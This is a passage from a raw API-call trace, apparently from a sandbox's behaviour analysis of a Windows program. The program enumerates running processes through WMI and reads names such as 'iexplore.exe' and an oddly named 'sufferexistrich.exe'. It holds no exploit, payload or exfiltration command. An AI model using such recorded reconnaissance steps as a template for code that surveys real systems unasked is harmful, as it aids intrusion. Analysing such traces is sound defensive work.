pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0223.840] IWbemClassObject:Get (in: This=0x5e89a70, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2144\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0223.840] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2144\"") returned 0x66 [0223.840] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2144\"") returned 0x66 [0223.840] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0223.840] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0223.841] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0223.841] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0223.842] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e891d0) returned 0x0 [0223.842] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e891d0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0223.842] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e891d0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e89ef0) returned 0x0 [0223.842] WbemDefPath:IUnknown:Release (This=0x5e891d0) returned 0x0 [0223.842] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89ef0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e89ef0) returned 0x0 [0223.842] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89ef0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0223.843] WbemDefPath:IUnknown:AddRef (This=0x5e89ef0) returned 0x3 [0223.843] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89ef0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0223.843] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89ef0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0223.843] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89ef0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e891e0) returned 0x0 [0223.843] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e891e0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0223.843] WbemDefPath:IUnknown:Release (This=0x5e891e0) returned 0x3 [0223.843] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0223.843] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0223.843] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89ef0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0223.843] WbemDefPath:IUnknown:Release (This=0x5e89ef0) returned 0x2 [0223.843] WbemDefPath:IUnknown:Release (This=0x5e89ef0) returned 0x1 [0223.843] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0223.843] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0223.844] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89ef0, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e89ef0) returned 0x0 [0223.844] WbemDefPath:IUnknown:AddRef (This=0x5e89ef0) returned 0x3 [0223.844] WbemDefPath:IUnknown:Release (This=0x5e89ef0) returned 0x2 [0223.844] WbemDefPath:IWbemPath:SetText (This=0x5e89ef0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2144\"") returned 0x0 [0223.844] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0223.844] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0223.844] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.844] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0223.844] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0223.844] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.844] IWbemClassObject:Get (in: This=0x5e89a70, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e19b8*=0, plFlavor=0x26e19bc*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x26e19b8*=8, plFlavor=0x26e19bc*=0) returned 0x0 [0223.844] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0223.844] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0223.844] IWbemClassObject:Get (in: This=0x5e89a70, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e19b8*=8, plFlavor=0x26e19bc*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x26e19b8*=8, plFlavor=0x26e19bc*=0) returned 0x0 [0223.845] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0223.845] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0223.845] CoTaskMemAlloc (cb=0x4) returned 0x5e89210 [0223.845] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89210, puReturned=0x26dde18 | out: apObjects=0x5e89210*=0x5e90678, puReturned=0x26dde18*=0x1) returned 0x0 [0223.933] IUnknown:QueryInterface (in: This=0x5e90678, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e90678) returned 0x0 [0223.933] IUnknown:QueryInterface (in: This=0x5e90678, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0223.933] IUnknown:QueryInterface (in: This=0x5e90678, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0223.934] IUnknown:AddRef (This=0x5e90678) returned 0x3 [0223.934] IUnknown:QueryInterface (in: This=0x5e90678, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0223.934] IUnknown:QueryInterface (in: This=0x5e90678, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0223.934] IUnknown:QueryInterface (in: This=0x5e90678, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e9067c) returned 0x0 [0223.934] IMarshal:GetUnmarshalClass (in: This=0x5e9067c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0223.934] IUnknown:Release (This=0x5e9067c) returned 0x3 [0223.934] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0223.934] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0223.934] IUnknown:QueryInterface (in: This=0x5e90678, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0223.934] IUnknown:Release (This=0x5e90678) returned 0x2 [0223.934] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0223.934] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0223.934] IUnknown:QueryInterface (in: This=0x5e90678, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e90678) returned 0x0 [0223.935] IUnknown:AddRef (This=0x5e90678) returned 0x4 [0223.935] IUnknown:Release (This=0x5e90678) returned 0x3 [0223.935] IUnknown:Release (This=0x5e90678) returned 0x2 [0223.935] CoTaskMemFree (pv=0x5e89210) [0223.935] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0223.935] IUnknown:AddRef (This=0x5e90678) returned 0x3 [0223.935] IWbemClassObject:Get (in: This=0x5e90678, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0223.935] IWbemClassObject:Get (in: This=0x5e90678, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2368\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0223.935] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2368\"") returned 0x66 [0223.935] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2368\"") returned 0x66 [0223.936] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0223.936] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0223.936] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0223.936] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0223.937] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e89210) returned 0x0 [0223.937] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89210, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0223.937] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89210, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e89fd0) returned 0x0 [0223.937] WbemDefPath:IUnknown:Release (This=0x5e89210) returned 0x0 [0223.937] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89fd0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e89fd0) returned 0x0 [0223.937] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89fd0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0223.938] WbemDefPath:IUnknown:AddRef (This=0x5e89fd0) returned 0x3 [0223.938] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89fd0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0223.938] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89fd0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0223.938] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89fd0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e89220) returned 0x0 [0223.938] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89220, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0223.938] WbemDefPath:IUnknown:Release (This=0x5e89220) returned 0x3 [0223.938] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0223.938] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0223.938] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89fd0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0223.938] WbemDefPath:IUnknown:Release (This=0x5e89fd0) returned 0x2 [0223.938] WbemDefPath:IUnknown:Release (This=0x5e89fd0) returned 0x1 [0223.938] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0223.938] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0223.938] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89fd0, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e89fd0) returned 0x0 [0223.938] WbemDefPath:IUnknown:AddRef (This=0x5e89fd0) returned 0x3 [0223.938] WbemDefPath:IUnknown:Release (This=0x5e89fd0) returned 0x2 [0223.938] WbemDefPath:IWbemPath:SetText (This=0x5e89fd0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2368\"") returned 0x0 [0223.938] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0223.938] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0223.939] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.939] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0223.939] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0223.939] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.939] IWbemClassObject:Get (in: This=0x5e90678, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e222c*=0, plFlavor=0x26e2230*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="sufferexistrich.exe", varVal2=0x0), pType=0x26e222c*=8, plFlavor=0x26e2230*=0) returned 0x0 [0223.939] SysStringByteLen (bstr="sufferexistrich.exe") returned 0x26 [0223.939] SysStringByteLen (bstr="sufferexistrich.exe") returned 0x26 [0223.939] IWbemClassObject:Get (in: This=0x5e90678, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e222c*=8, plFlavor=0x26e2230*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="sufferexistrich.exe", varVal2=0x0), pType=0x26e222c*=8, plFlavor=0x26e2230*=0) returned 0x0 [0223.939] SysStringByteLen (bstr="sufferexistrich.exe") returned 0x26 [0223.939] SysStringByteLen (bstr="sufferexistrich.exe") returned 0x26 [0223.939] CoTaskMemAlloc (cb=0x4) returned 0x5e89250 [0223.939] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89250, puReturned=0x26dde18 | out: apObjects=0x5e89250*=0x5e90af0, puReturned=0x26dde18*=0x1) returned 0x0 [0224.471] IUnknown:QueryInterface (in: This=0x5e90af0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e90af0) returned 0x0 [0224.471] IUnknown:QueryInterface (in: This=0x5e90af0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.471] IUnknown:QueryInterface (in: This=0x5e90af0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.472] IUnknown:AddRef (This=0x5e90af0) returned 0x3 [0224.472] IUnknown:QueryInterface (in: This=0x5e90af0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.472] IUnknown:QueryInterface (in: This=0x5e90af0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.472] IUnknown:QueryInterface (in: This=0x5e90af0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e90af4) returned 0x0 [0224.472] IMarshal:GetUnmarshalClass (in: This=0x5e90af4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.472] IUnknown:Release (This=0x5e90af4) returned 0x3 [0224.472] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.472] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.472] IUnknown:QueryInterface (in: This=0x5e90af0, 